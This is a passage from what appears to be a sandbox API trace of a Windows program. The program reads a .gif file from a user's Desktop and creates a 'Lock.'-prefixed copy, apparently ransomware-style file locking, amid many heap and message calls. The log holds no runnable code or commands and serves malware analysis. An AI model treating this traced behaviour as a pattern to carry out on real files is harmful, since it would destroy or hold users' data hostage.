0x34a0120 [0162.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0162.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0162.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0162.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0162.816] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0162.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0162.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0162.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0162.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0162.816] CryptDestroyHash (hHash=0xaa56a0) returned 1 [0162.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0162.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0162.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0162.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0162.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0162.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0162.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0162.816] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0162.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0162.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0162.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0162.817] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0162.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0162.817] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0162.817] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0162.817] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0162.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0162.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0162.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0162.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0162.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0162.817] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/d1NqFAAxwvSf3pfr2yZp.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\d1nqfaaxwvsf3pfr2yzp.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0162.822] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0162.822] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0162.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0162.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0162.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0162.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0162.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0162.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0162.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0162.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0162.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0162.823] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0162.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0162.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0162.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0162.823] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0162.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0162.823] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0162.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0162.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0162.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0162.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0162.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0162.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0162.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0162.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0162.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0162.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0162.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0162.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0162.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0162.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0162.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0162.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0162.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0162.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0162.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0162.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0162.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0162.824] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0162.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0162.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0162.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0162.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x24c7a50 [0162.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0162.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0162.824] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/Lock.d1NqFAAxwvSf3pfr2yZp.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\lock.d1nqfaaxwvsf3pfr2yzp.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0162.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0162.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0162.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0162.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0162.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0162.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0162.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0162.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0162.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0162.826] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0162.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0162.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0162.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0162.826] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0162.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0162.826] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0162.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0162.826] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0162.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0162.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0162.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0162.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0162.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0162.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0162.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0162.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0162.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0162.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0162.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0162.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0162.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0162.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0162.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0162.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0162.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0162.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0162.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0162.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0162.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0162.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0162.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0162.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0162.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0162.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0162.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0162.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0162.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0162.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0162.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0162.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x100000) returned 0x36a0020 [0162.828] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0162.828] ReadFile (in: hFile=0x170, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0xd16c, lpOverlapped=0x0) returned 1 [0162.830] ReadFile (in: hFile=0x170, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0162.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0162.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0162.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0162.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0162.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd16c) returned 0x24d7a58 [0162.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x36a0020 | out: hHeap=0x25c0000) returned 1 [0162.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0162.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0162.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0162.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0162.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0162.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0162.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0162.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0162.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd16c) returned 0x24e4bd0 [0162.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24d7a58 | out: hHeap=0x25c0000) returned 1 [0162.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0162.832] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0162.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0162.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0162.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0162.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0162.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0162.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd16c) returned 0x24d7a58 [0162.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0162.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24d7a58 | out: hHeap=0x25c0000) returned 1 [0162.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0162.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0162.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0162.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0162.832] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0162.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0162.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0162.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0162.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0162.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0162.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0162.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0162.833] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0162.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0162.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0162.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0162.833] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0162.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0162.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0162.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0162.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1698 [0162.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0162.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0162.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0162.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0162.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd16c) returned 0x24d7a58 [0162.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0162.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1938 [0162.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0162.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0162.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0162.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c28 [0162.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0162.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0162.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0162.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2058 [0162.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0162.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0162.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0162.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9af8 [0162.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0162.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0162.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0162.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0162.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0162.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0162.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0162.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd16c) returned 0x34b2250 [0162.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0162.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0162.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0162.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0162.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0162.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0162.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0162.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0162.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0162.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0162.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0162.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0162.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0162.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0162.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0162.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0162.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0162.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0162.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 